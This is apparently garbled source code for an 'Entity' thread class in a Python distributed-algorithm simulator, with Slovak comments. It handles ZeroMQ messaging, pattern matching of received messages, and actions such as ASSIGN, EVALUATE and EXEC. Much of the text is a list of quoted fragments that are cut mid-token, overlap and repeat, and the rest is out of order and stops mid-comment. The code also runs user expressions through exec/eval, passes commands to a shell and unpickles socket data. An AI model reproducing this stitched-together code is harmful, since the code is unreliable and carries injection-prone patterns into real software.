__init__(self, program, version, date, author): self.program" ]
[ "_output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type ==", "READ | Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id))", "try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1}", "# Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne", "True. Ak sa hodnoty nezhodujú # a vo vzore nie je na pozícii", "become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME | Old state : {1} | New", "premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN", "of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression):", "Pre pozície # kde je vo vzore premenná si uložíme hodnotu None. if", "loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED | Message : {1} | From entity", "False znamená to, že prijatá správa # sa zhoduje so vzorom. if False", "# odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message", "__dict__, v ktorom # sú uchované všetky aktuálne referencie premenných a ich hodnôt.", ": {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN", "as _Attribute: _logger.info(\"Entity: {0} | Action: EVALUATE | Wrong type of identifier! ->", "identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND |", "= \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression", "def execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None", "type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break _n =", "nieje na poziícii premenná # uložíme si do premennej _result hodnotu True. Ak", "sú premennými dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message)", "log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def", "= Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN)", "konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p != 'IMPULSE',", "{0} | Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name,", "premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _", "do premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore", "# Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá je", "_self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression, {}, _self.__dict__) except", "# Iterujeme cez správanie. while _n is not None: # Vykonáme logiku uzlu.", "_self._read_lock = False # Nastavíme _n na prvý uzol správania príslušného pre aktuálny", "je tento nový stav terminujúci tak ukončíme správanie. if _self._state in _self._term_states: exit()", "_logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError", "type of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def", "-> {2} \".format(_self._id, _Value,_expression)) exit() return result @support_arguments def execute(_command, _output_type, _output, _input):", "{}, _self.__dict__) _logger.info(\"Entity: {0} | Action: ASSIGN | Expression : {1} \".format(_self._id, _expression))", "a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id =", "(_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\":", "value for output cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout))", "vzore nie je na pozícii premenná úložíme hodnotu False. Pre pozície # kde", "'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True", "False _self._read_lock = False _self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER)", "prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame a následne extrahujeme obsah", "READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda _p: _p !=", "import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state,", "# premenným entity, ktoré používateľ opísal v algoritme je nutné predať funkcii #", "pickle import dumps, loads from logging import getLogger from soda.helpers import support_arguments from", "soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE", "pozícii vo vzore a # prijatej správe tá istá hodnota a vo vzore", "= \"%s = %s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie.", "{0} | Action: READ | Message : {1} | From entity : {2}", "je definovaný # reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym", "= [_n for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def", "prostredníctvom tretieho argumenty atribút objektu __dict__, v ktorom # sú uchované všetky aktuálne", "-> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \"", "= _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message = (_message, ) # Ak", "output type if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\"", "to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type ==", "-> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try:", "value for output cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout))", "logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from", "_ = _i if type(_j) is str: _j = \"'\" + _j +", "poslania správy. Zaznamenaný je identifikátor # odosielateľa, prijímateľa a samotná správa. _logger.info(\"Entity: {0}", "== 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0}", "not in _self._term_states: _current_state = _self._state # Entita sa spustí impulzom alebo začne", "type(_message) is not tuple: _message = (_message, ) # Ak je prijímateľ iba", ") # Ak je prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients)", "správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is", "To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: #", "so vzorom. Ak je na rovnakej pozícii vo vzore a # prijatej správe", "vo vzore a # prijatej správe tá istá hodnota a vo vzore nieje", "vzorom. if False not in _result: # Pre pozície kde je vo vzore", "prijímateľ iba jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients =", "prijímateľa a samotná správa. _logger.info(\"Entity: {0} | Action: SEND | Message : {1}", "from logging import getLogger from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode", "== len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i == _j and", "EVALUATE | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute, _expression))", "cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type", "uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message):", "Action: ASSIGN | Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Attribute,", "že prijatá správa # sa zhoduje so vzorom. if False not in _result:", "in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme správu", "execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process", "is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break _n = _next_node", "is not tuple: _result.append(True) elif _i != _j and type(_i) is not tuple:", "!= _j and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v", "_self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments", "_current_state = _self._state # Entita sa spustí impulzom alebo začne čítať prijaté správy.", "identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute:", "uzlu. Logika uzlov je opísaná # v podkapitole 4.2.3 Správanie. if type(_n) is", "príslušnej # pozície v správe do tejto premennej. for _i, _j in zip(_pattern[1],", "nie je na pozícii premenná úložíme hodnotu False. Pre pozície # kde je", "= _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1} | From", "from shlex import split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread):", "vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for _i,", "for _n in _neighbours] _self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): #", "threading import Thread from pickle import dumps, loads from logging import getLogger from", "soket prišla správa. while True: _socks = dict(_poller.poll()) # Ak prišla správa. if", "exit() _expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array,", "ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity: {0}", "= %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value): _expression = \"%s.append(%s)\"", "%s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\":", "= False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id))", "class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id", "{2} \".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state =", "-> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression))", "except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined identifier! ->", "# prijatej správe tá istá hodnota a vo vzore nieje na poziícii premenná", "else: _result.append(None) # Ak v v poli _result nie je hodnota False znamená", "| Action: ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression))", "ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC | Wrong value for", "hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore nie je na", "_self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý uzol správania príslušného pre", "{0} | Action: SEND | Trying to send message to non existing neighbour!", "_pattern in list(filter(lambda _p: _p != 'IMPULSE', _self._states_behaviors[_self._state])): _result = [] # Porovnáme", "{}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE | Undefined", "| Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) #", "from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip,", "vzor, ktorý sa zhodoval so správou, ktorú sme # prijali aby sme mohli", "o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"])", "| Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit()", "POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n for _n in _neighbours] _self.__dict__['deepcopy'] =", "kde je vo vzore premenná uložíme hodnotu z príslušnej # pozície v správe", "_behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock", "nový soket typu DEALER [18]. Následne # odošleme správu spolu s identifikátorom odosieľatela", "and type(_i) is not tuple: _result.append(False) else: _result.append(None) # Ak v v poli", "_in_port _self._state = _state _self._term_states = _term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours", "exec vykonať je definovaný # reťazcom _expression. Aby mala funkcia exec() prístup ku", "Old state : {1} | New state : {2} \".format(_self._id, _self._state, _new_state)) #", "(_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný", "\"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\":", "= eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity: {0} | Action: EVALUATE", "_self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False _self._count_sent_messages", "zmq import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from pickle", "nedostane do terminujúceho stavu. while _self._state not in _self._term_states: _current_state = _self._state #", "je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message): for", "Message : {1} | From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Nakoniec", "in _recipients: try: _out_socket = _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id)", "kde je vo vzore premenná si uložíme hodnotu None. if len(_pattern[1]) == len(_received_message):", "= { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\":", "_self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE", "Started by IMPULSE \".format(_self._id)) else: _self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock =", "% _self._in_port) _poller = Poller() _poller.register(_self._in_socket, POLLIN) _self.i_ID = int(_id) _self.i_NEIGHBOURS = [_n", "\".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except", "@support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try:", "Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head", "_self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme, či na soket", "not tuple: _message = (_message, ) # Ak je prijímateľ iba jeden pretypujeme", "_Attribute, _expression)) exit() except ValueError as _Value: _logger.info(\"Entity: {0} | Action: EVALUATE |", "Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id =", "print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None try: result = eval(_expression,", "_new_state # Ak je tento nový stav terminujúci tak ukončíme správanie. if _self._state", "len(_pattern[1]) == len(_received_message): for _i, _j in zip(_pattern[1], _received_message): if _i == _j", "_sender_entity_id)) # Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme #", "Nakoniec vrátime vzor, ktorý sa zhodoval so správou, ktorú sme # prijali aby", "do použitelnej premennej. _self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message", "exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme", "= \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read,", ": {1} | New state : {2} \".format(_self._id, _self._state, _new_state)) # Entita zmení", "EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except", "is ActionNode: _next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if", "Message : {1} | To entity : {2} \".format(_self._id, _message, _n)) _self._count_sent_messages +=", "= 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller =", "Action: EVALUATE | Wrong value! -> {1} -> {2} \".format(_self._id, _Value,_expression)) exit() return", "split(_command) _input = _self._actions[\"EVALUATE\"](str(_input)) _process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True)", "int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif _output_type == 'float':", "_self._state = _new_state # Ak je tento nový stav terminujúci tak ukončíme správanie.", "jeden pretypujeme ho na pole. if type(_recipients) is int: _recipients = [_recipients] *", "dostali konkrétne hodnity. _message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not", "_expression = \"%s = %s\" % (_output, _process_output) _self._actions[\"ASSIGN\"]((_expression,)) @support_arguments def add(_array, _value):", "Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port = _in_port _self._state = _state", "napríklad v prípade # argumentov, ktoré sú premennými dostali konkrétne hodnity. _message =", "cast to float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression =", "if type(_i) is tuple: _identifier, _ = _i if type(_j) is str: _j", "= _context.socket(DEALER) _out_socket.connect(\"tcp://localhost:%s\" % _self._neighbours[_n][\"in_port\"]) _message_content = (_message, _self._id) _pickled_message = dumps(_message_content) _out_socket.send(_pickled_message,", "from soda.helpers import support_arguments from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run,", "output cast to int! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() elif", "ku všetkým lokálnym # premenným entity, ktoré používateľ opísal v algoritme je nutné", "_self.__dict__['deepcopy'] = deepcopy _self.__dict__['LEN'] = len def read(): # V nekonečnom cykle sledujeme,", "return _pattern @support_arguments def send(_message, _recipients): # Vykonáme evaluáciu správy a prijímateľov aby", "_pickled_received_message = _self._in_socket.recv(flags=DONTWAIT) _received_message, _sender_entity_id = loads(_pickled_received_message) _logger.info(\"Entity: {0} | Action: RECEIVED |", "je na rovnakej pozícii vo vzore a # prijatej správe tá istá hodnota", "type(_i) is not tuple: _result.append(True) elif _i != _j and type(_i) is not", "KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND | Trying", "do nejakej premennej využívame funkciu exec(), # ktorá je jednou zo vstavaných funkcií", "result @support_arguments def execute(_command, _output_type, _output, _input): _command = split(_command) _input = _self._actions[\"EVALUATE\"](str(_input))", "v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif type(_n)", "= 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by IMPULSE \".format(_self._id)) else: _self._read_lock =", "_next_node = _n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node ==", "_self._read_lock = True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na", "uložíme si do premennej _result hodnotu True. Ak sa hodnoty nezhodujú # a", "_next_node = None # Iterujeme cez správanie. while _n is not None: #", "str: _j = \"'\" + _j + \"'\" _expression = \"%s = %s\"", "_self.i_SENDER = _sender_entity_id _logger.info(\"Entity: {0} | Action: READ | Message : {1} |", "_in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self) _self._id = _id _self._ip = _ip _self._in_port", "\".format(_self._id, _self._state, _new_state)) # Entita zmení svoj stav na nový. _self._state = _new_state", "pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output, _array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions =", "neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} | Action: BECOME", "Wrong type of identifier! -> {1} -> {2} \".format(_self._id, _Type, _expression)) exit() @support_arguments", "copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port,", "začne čítať prijaté správy. if _self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity:", "mala funkcia exec() prístup ku všetkým lokálnym # premenným entity, ktoré používateľ opísal", "do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple:", "nie je hodnota False znamená to, že prijatá správa # sa zhoduje so", "non existing neighbour! -> {1} \".format(_self._id, _n)) @support_arguments def become(_new_state): _logger.info(\"Entity: {0} |", "From entity : {2} \".format(_self._id, _received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými", "príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez", "v poli _result nie je hodnota False znamená to, že prijatá správa #", "_result: # Pre pozície kde je vo vzore premenná uložíme hodnotu z príslušnej", "= True _behavior = _self._actions[\"READ\"]() _self._read_lock = False # Nastavíme _n na prvý", "_self._count_sent_messages = 0 _context = Context() _self._in_socket = _context.socket(DEALER) _self._in_socket.bind(\"tcp://*:%s\" % _self._in_port) _poller", "= dict(_poller.poll()) # Ak prišla správa. if _socks.get(_self._in_socket) == POLLIN: # Správu prečítame", "from zmq import Context, DONTWAIT, Poller, POLLIN, DEALER from threading import Thread from", "{0} | Action: EVALUATE | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name,", "= None try: result = eval(_expression, {}, _self.__dict__) except NameError as _Name: _logger.info(\"Entity:", "exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as _Value:", "from soda.distributed_environment.behavior import ActionNode, IfNode from subprocess import run, PIPE from shlex import", "getLogger(__name__) class Entity(Thread): def __init__(_self, _id, _ip, _in_port, _state, _term_states, _states_behaviors, _neighbours): Thread.__init__(_self)", "_term_states _self._states_behaviors = _states_behaviors _self._neighbours = _neighbours _self._impulse = False _self._read_lock = False", "_n na prvý uzol správania príslušného pre aktuálny stav. _n = _self._states_behaviors[_current_state][_behavior].head _next_node", "premenným entity, ktoré používateľ opísal v algoritme je nutné predať funkcii # exec()", "_expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN | Wrong", "_result nie je hodnota False znamená to, že prijatá správa # sa zhoduje", "\"'\" + _j + \"'\" _expression = \"%s = %s\" % (_identifier, _j)", "except NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! ->", "_n.execute(_self) elif type(_n) is IfNode: _next_node = _n.execute(_self) if _next_node == \"BECOME\": break", "== _j and type(_i) is not tuple: _result.append(True) elif _i != _j and", "referencie premenných a ich hodnôt. try: exec(_expression, {}, _self.__dict__) _logger.info(\"Entity: {0} | Action:", "Action: READ | Message : {1} | From entity : {2} \".format(_self._id, _received_message,", "dumps(_message_content) _out_socket.send(_pickled_message, flags=DONTWAIT) # Zalogovanie úspešného poslania správy. Zaznamenaný je identifikátor # odosielateľa,", "počet # odoslaných správ pre entitu o 1. for _n in _recipients: try:", "split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def __init__(_self, _id,", "Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný # reťazcom _expression. Aby", "nový. _self._state = _new_state # Ak je tento nový stav terminujúci tak ukončíme", "| Trying to send message to non existing neighbour! -> {1} \".format(_self._id, _n))", "_received_message, _sender_entity_id)) # Porovnámme prijatú správu so všetkými vzormi READ konštrukcií pre #", "| Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as _Name:", "_process_output= None _completed_process = run(_command, input=str(_input), stdout=PIPE, universal_newlines=True, shell=True) # cast to correct", "float! -> {1} -> {2} \".format(_self._id, _Value, _completed_process.stdout)) exit() _expression = \"%s =", "_Type, _expression)) exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result", "not in _result: # Pre pozície kde je vo vzore premenná uložíme hodnotu", "Action: EXEC | Wrong value for output cast to float! -> {1} ->", "= _self._states_behaviors[_current_state][_behavior].head _next_node = None # Iterujeme cez správanie. while _n is not", "# Entita zmení svoj stav na nový. _self._state = _new_state # Ak je", "to, že prijatá správa # sa zhoduje so vzorom. if False not in", "_j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do", "premenná uložíme hodnotu z príslušnej # pozície v správe do tejto premennej. for", "_completed_process.stdout)) exit() elif _output_type == 'float': try: _process_output = float(_completed_process.stdout) except ValueError as", "POLLIN: # Správu prečítame a následne extrahujeme obsah správy a odosieľatela. _pickled_received_message =", "from subprocess import run, PIPE from shlex import split from copy import deepcopy", "\"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\": execute, \"ADD\": add, \"REMOVE\": remove, \"POP\":", "\"ADD\": add, \"REMOVE\": remove, \"POP\": pop } def run(_self): # Entita vykonáva správanie", "shlex import split from copy import deepcopy _logger = getLogger(__name__) class Entity(Thread): def", "Action: RECEIVED | Message : {1} | From entity : {2} \".format(_self._id, _received_message,", "NameError as _Name: _logger.info(\"Entity: {0} | Action: ASSIGN | Undefined identifier! -> {1}", "# v podkapitole 4.2.3 Správanie. if type(_n) is ActionNode: _next_node = _n.execute(_self) elif", "pozície v správe do tejto premennej. for _i, _j in zip(_pattern[1], _received_message): if", "je jednou zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny", "_self._impulse: _self._impulse = False _behavior = 'IMPULSE' _logger.info(\"Entity: {0} | Action: Started by", "shell=True) # cast to correct output type if _output_type == 'string': _process_output =", "_array) _self._actions[\"ASSIGN\"]((_expression,)) _self._actions = { \"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign,", "(_message, ) # Ak je prijímateľ iba jeden pretypujeme ho na pole. if", "\"POP\": pop } def run(_self): # Entita vykonáva správanie pokiaľ sa nedostane do", "if _output_type == 'string': _process_output = \"'\" + _completed_process.stdout + \"'\" elif _output_type", "_value): _expression = \"%s.append(%s)\" % (_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression", "= False # Nastavíme _n na prvý uzol správania príslušného pre aktuálny stav.", "exit() @support_arguments def assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu", "try: _process_output = float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action:", "is not tuple: _result.append(False) else: _result.append(None) # Ak v v poli _result nie", "= float(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC |", "\"READ\": read, \"SEND\": send, \"BECOME\": become, \"ASSIGN\": assign, \"LOG\": log, \"EVALUATE\": evaluate, \"EXEC\":", "= int(_completed_process.stdout) except ValueError as _Value: _logger.info( \"Entity: {0} | Action: EXEC |", "\".format(_self._id, _Attribute, _expression)) exit() except TypeError as _Type: _logger.info(\"Entity: {0} | Action: ASSIGN", "_result hodnotu True. Ak sa hodnoty nezhodujú # a vo vzore nie je", "_i, _j in zip(_pattern[1], _received_message): if type(_i) is tuple: _identifier, _ = _i", "_received_message): if type(_i) is tuple: _identifier, _ = _i if type(_j) is str:", "{0} | Action: SEND | Message : {1} | To entity : {2}", "na pozícii premenná úložíme hodnotu False. Pre pozície # kde je vo vzore", "Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression, )) # Uložíme odosieľatela do použitelnej premennej.", "so všetkými vzormi READ konštrukcií pre # aktuálny stav. for _pattern in list(filter(lambda", "správ pre entitu o 1. for _n in _recipients: try: _out_socket = _context.socket(DEALER)", "_n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0}", "{2} \".format(_self._id, _message, _n)) _self._count_sent_messages += 1 except KeyError: # Zalogovanie neúspešného odoslania", "except KeyError: # Zalogovanie neúspešného odoslania správy. _logger.info(\"Entity: {0} | Action: SEND |", "read(): # V nekonečnom cykle sledujeme, či na soket prišla správa. while True:", "\"%s = %s\" % (_identifier, _j) # Využijeme akciu entity pre priradenie. _self._actions[\"ASSIGN\"]((_expression,", "ASSIGN | Undefined identifier! -> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except", "_value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def pop(_array, _output): _expression = \"%s = %s.pop()\" % (_output,", "evaluáciu správy a prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú", "zo vstavaných funkcií jazyka Python. Exec() dokáže vykonať # akýkolvek valídny Python príkaz.", "None # Iterujeme cez správanie. while _n is not None: # Vykonáme logiku", "Action: ASSIGN | Expression : {1} \".format(_self._id, _expression)) except NameError as _Name: _logger.info(\"Entity:", "= None # Iterujeme cez správanie. while _n is not None: # Vykonáme", "správu so vzorom. Ak je na rovnakej pozícii vo vzore a # prijatej", "pozície kde je vo vzore premenná uložíme hodnotu z príslušnej # pozície v", "správy a prijímateľov aby sme napríklad v prípade # argumentov, ktoré sú premennými", "_logger.info(\"Entity: {0} | Action: SEND | Message : {1} | To entity :", "import ActionNode, IfNode from subprocess import run, PIPE from shlex import split from", "_result.append(True) elif _i != _j and type(_i) is not tuple: _result.append(False) else: _result.append(None)", "_message = _self._actions[\"EVALUATE\"](str(_message)) _recipients = _self._actions[\"EVALUATE\"](str(_recipients)) if type(_message) is not tuple: _message =", "vykonať # akýkolvek valídny Python príkaz. Príkaz, ktorý ma exec vykonať je definovaný", "# reťazcom _expression. Aby mala funkcia exec() prístup ku všetkým lokálnym # premenným", "Ak v v poli _result nie je hodnota False znamená to, že prijatá", "assign(_expression): # Pre uskutočnenie priradenia do nejakej premennej využívame funkciu exec(), # ktorá", "-> {1} -> {2} \".format(_self._id, _Name, _expression)) exit() except AttributeError as _Attribute: _logger.info(\"Entity:", "exit() @support_arguments def log(_expression): print(\"SODA: \" + _self._actions[\"EVALUATE\"](_expression)) def evaluate(_expression): result = None", "(_array, _value) _self._actions[\"EVALUATE\"](str(_expression)) @support_arguments def remove(_array, _value): _expression = \"%s.remove(%s)\" % (_array, _value)", "ktorý sa zhodoval so správou, ktorú sme # prijali aby sme mohli následne", "# odošleme správu spolu s identifikátorom 